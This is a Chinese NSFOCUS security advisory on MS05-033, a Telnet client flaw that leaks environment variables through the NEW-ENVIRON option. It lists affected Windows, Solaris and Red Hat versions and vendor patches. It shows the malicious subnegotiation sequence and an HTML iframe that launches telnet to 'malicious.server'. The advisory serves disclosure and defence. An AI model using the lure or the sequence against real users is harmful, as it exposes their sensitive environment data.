首页 -> 安全研究

安全研究

安全漏洞
多家厂商Telnet客户端环境变量信息泄露漏洞(MS05-033)

发布日期:2005-06-15
更新日期:2005-06-15

受影响系统:
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows Services for UNIX 3.5
Microsoft Windows Services for UNIX 3.0
Microsoft Windows Services for UNIX 2.2
RedHat Linux Advanced Workstation 2.1
Sun Solaris 9.0_x86 Update 2
Sun Solaris 9.0_x86
Sun Solaris 9.0
Sun Solaris 8.0_x86
Sun Solaris 8.0
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.8
Sun Solaris 2.7 sparc
Sun Solaris 2.7
Sun Solaris 10.0
Sun SunOS 5.9_x86
Sun SunOS 5.9
Sun SunOS 5.8_x86
Sun SunOS 5.8
Sun SunOS 5.7_x86
Sun SunOS 5.7
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux Desktop 4
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux AS 2.1
RedHat Desktop 3.0
Sun SEAM 1.0.2
Sun SEAM 1.0.1
Sun SEAM 1.0
MIT Kerberos 5 1.3.6
不受影响系统:
Microsoft Windows ME
Microsoft Windows 98se
Microsoft Windows 98
Microsoft Windows 2000SP4
Microsoft Windows 2000SP3
描述:
BUGTRAQ  ID: 13940
CVE(CAN) ID: CVE-2005-1205,CVE-2005-0488

TELNET协议允许虚拟网络终端通过Internet进行连接。

多家厂商的Telnet客户端存在设计错误,可能允许远程攻击者获得受攻击系统的敏感信息。

具体的说,Telnet客户端在处理NEW-ENVIRON子协商选项时会触发这个漏洞,恶意的服务器可以向已连接的客户端发送以下Telnet子协商选项:

SB NEW-ENVIRON SEND ENV_USERVAR <name of environment variable> SE

然后有漏洞的客户端就会发回环境变量的内容,这其中可能包含有敏感信息。

如果要利用这个漏洞,攻击者必须诱骗用户连接到恶意的服务器。可能通过网页自动启动telnet命令,如:

<html><body>
<iframe src='telnet://malicious.server/'>
</body>

一旦打开了这个网页,就会自动启动telnet客户端并试图连接到主机“malicious.server”。

<*来源:Ga&euml;l Delalleau (gael.delalleau+moz@m4x.org
        iDEFENSE
  
  链接:http://www.idefense.com/application/poi/display?id=260&type=vulnerabilities
        http://www.microsoft.com/technet/security/Bulletin/MS05-033.mspx
        http://www.us-cert.gov/cas/techalerts/TA05-165A.html
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-101671-1
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-101665-1
        http://lwn.net/Alerts/139795/?format=printable
*>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 对于Windows平台,注销默认的Telnet客户端。

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS05-033)以及相应补丁:
MS05-033:Vulnerability in Telnet Client Could Allow Information Disclosure (896428)
链接:http://www.microsoft.com/technet/security/Bulletin/MS05-033.mspx

RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2005-504-00)以及相应补丁:
RHSA-2005-504-00:Moderate: telnet security update
链接:http://lwn.net/Alerts/139795/?format=printable

补丁下载:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1:

SRPMS:
ftp://updates.redhat.com/enterprise/2.1AS/en/os/SRPMS/tel...
29916c3c5d489abe67b924e5632eb181  telnet-0.17-20.EL2.4.src.rpm

i386:
c60a0c2b5f95fce95ca50bff53026acf  telnet-0.17-20.EL2.4.i386.rpm
a058fc85f4236cb0c636159aa7d633ce  telnet-server-0.17-20.EL2.4.i386.rpm

ia64:
5b47dc975fa30ec5cd2ca87688d88a75  telnet-0.17-20.EL2.4.ia64.rpm
dfcb49651938529dc80948e6b2e590ac  telnet-server-0.17-20.EL2.4.ia64.rpm

Red Hat Linux Advanced Workstation 2.1:

SRPMS:
ftp://updates.redhat.com/enterprise/2.1AW/en/os/SRPMS/tel...
29916c3c5d489abe67b924e5632eb181  telnet-0.17-20.EL2.4.src.rpm

ia64:
5b47dc975fa30ec5cd2ca87688d88a75  telnet-0.17-20.EL2.4.ia64.rpm
dfcb49651938529dc80948e6b2e590ac  telnet-server-0.17-20.EL2.4.ia64.rpm

Red Hat Enterprise Linux ES version 2.1:

SRPMS:
ftp://updates.redhat.com/enterprise/2.1ES/en/os/SRPMS/tel...
29916c3c5d489abe67b924e5632eb181  telnet-0.17-20.EL2.4.src.rpm

i386:
c60a0c2b5f95fce95ca50bff53026acf  telnet-0.17-20.EL2.4.i386.rpm
a058fc85f4236cb0c636159aa7d633ce  telnet-server-0.17-20.EL2.4.i386.rpm

Red Hat Enterprise Linux WS version 2.1:

SRPMS:
ftp://updates.redhat.com/enterprise/2.1WS/en/os/SRPMS/tel...
29916c3c5d489abe67b924e5632eb181  telnet-0.17-20.EL2.4.src.rpm

i386:
c60a0c2b5f95fce95ca50bff53026acf  telnet-0.17-20.EL2.4.i386.rpm
a058fc85f4236cb0c636159aa7d633ce  telnet-server-0.17-20.EL2.4.i386.rpm

Red Hat Enterprise Linux AS version 3:

SRPMS:
ftp://updates.redhat.com/enterprise/3AS/en/os/SRPMS/telne...
683f3a6fae5f0b9b43249390527a79cc  telnet-0.17-26.EL3.3.src.rpm

i386:
cda1f619d2f864c113e068e616c65530  telnet-0.17-26.EL3.3.i386.rpm
f40313804ebecab1cf57b4531af1e5e7  telnet-server-0.17-26.EL3.3.i386.rpm

ia64:
9f3533a862605330846e18d41705ed74  telnet-0.17-26.EL3.3.ia64.rpm
3cc79bf807d6c0ef2c88be4a9b11797f  telnet-server-0.17-26.EL3.3.ia64.rpm

ppc:
1f8614267bf84b13cafdae5c2f71efdf  telnet-0.17-26.EL3.3.ppc.rpm
71a2ff5505d6b3c3ad73322e4f6d7d12  telnet-server-0.17-26.EL3.3.ppc.rpm

s390:
041ae907bd1b00bcd556d4599c330334  telnet-0.17-26.EL3.3.s390.rpm
22d56448d6f29cfdbf89aff0c04f994e  telnet-server-0.17-26.EL3.3.s390.rpm

s390x:
4a75669c15e077bde8d67fef617bd3e7  telnet-0.17-26.EL3.3.s390x.rpm
bcf68468a636a170d6f9897d5b4693b4  telnet-server-0.17-26.EL3.3.s390x.rpm

x86_64:
83d8e20716ce1d6d98600fe29195713d  telnet-0.17-26.EL3.3.x86_64.rpm
560945441fdcefa6ceedb38ddf2f8869  telnet-server-0.17-26.EL3.3.x86_64.rpm

Red Hat Desktop version 3:

SRPMS:
ftp://updates.redhat.com/enterprise/3desktop/en/os/SRPMS/...
683f3a6fae5f0b9b43249390527a79cc  telnet-0.17-26.EL3.3.src.rpm

i386:
cda1f619d2f864c113e068e616c65530  telnet-0.17-26.EL3.3.i386.rpm
f40313804ebecab1cf57b4531af1e5e7  telnet-server-0.17-26.EL3.3.i386.rpm

x86_64:
83d8e20716ce1d6d98600fe29195713d  telnet-0.17-26.EL3.3.x86_64.rpm
560945441fdcefa6ceedb38ddf2f8869  telnet-server-0.17-26.EL3.3.x86_64.rpm

Red Hat Enterprise Linux ES version 3:

SRPMS:
ftp://updates.redhat.com/enterprise/3ES/en/os/SRPMS/telne...
683f3a6fae5f0b9b43249390527a79cc  telnet-0.17-26.EL3.3.src.rpm

i386:
cda1f619d2f864c113e068e616c65530  telnet-0.17-26.EL3.3.i386.rpm
f40313804ebecab1cf57b4531af1e5e7  telnet-server-0.17-26.EL3.3.i386.rpm

ia64:
9f3533a862605330846e18d41705ed74  telnet-0.17-26.EL3.3.ia64.rpm
3cc79bf807d6c0ef2c88be4a9b11797f  telnet-server-0.17-26.EL3.3.ia64.rpm

x86_64:
83d8e20716ce1d6d98600fe29195713d  telnet-0.17-26.EL3.3.x86_64.rpm
560945441fdcefa6ceedb38ddf2f8869  telnet-server-0.17-26.EL3.3.x86_64.rpm

Red Hat Enterprise Linux WS version 3:

SRPMS:
ftp://updates.redhat.com/enterprise/3WS/en/os/SRPMS/telne...
683f3a6fae5f0b9b43249390527a79cc  telnet-0.17-26.EL3.3.src.rpm

i386:
cda1f619d2f864c113e068e616c65530  telnet-0.17-26.EL3.3.i386.rpm
f40313804ebecab1cf57b4531af1e5e7  telnet-server-0.17-26.EL3.3.i386.rpm

ia64:
9f3533a862605330846e18d41705ed74  telnet-0.17-26.EL3.3.ia64.rpm
3cc79bf807d6c0ef2c88be4a9b11797f  telnet-server-0.17-26.EL3.3.ia64.rpm

x86_64:
83d8e20716ce1d6d98600fe29195713d  telnet-0.17-26.EL3.3.x86_64.rpm
560945441fdcefa6ceedb38ddf2f8869  telnet-server-0.17-26.EL3.3.x86_64.rpm

Red Hat Enterprise Linux AS version 4:

SRPMS:
ftp://updates.redhat.com/enterprise/4AS/en/os/SRPMS/telne...
1afaad8fd9a0ca90f633f8b3d92dcac9  telnet-0.17-31.EL4.3.src.rpm

i386:
f7e6d78d44ea95b7354b153299917a48  telnet-0.17-31.EL4.3.i386.rpm
d8a97db3761f4c061abe9d33a6a55957  telnet-server-0.17-31.EL4.3.i386.rpm

ia64:
757b16c60d7a14c79e4db0da16f54611  telnet-0.17-31.EL4.3.ia64.rpm
1a61e1b55a96709364e4212c64004708  telnet-server-0.17-31.EL4.3.ia64.rpm

ppc:
ab9af8408934a5c90732752c237fb534  telnet-0.17-31.EL4.3.ppc.rpm
079055dcc0cb9a6ab3a8bbcca0c1d208  telnet-server-0.17-31.EL4.3.ppc.rpm

s390:
3498586b518d408a50b71c6c2f9f88c6  telnet-0.17-31.EL4.3.s390.rpm
3cb3275401f0aac56
可使用下列命令安装补丁:

rpm -Fvh [文件名]

浏览次数:4903
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客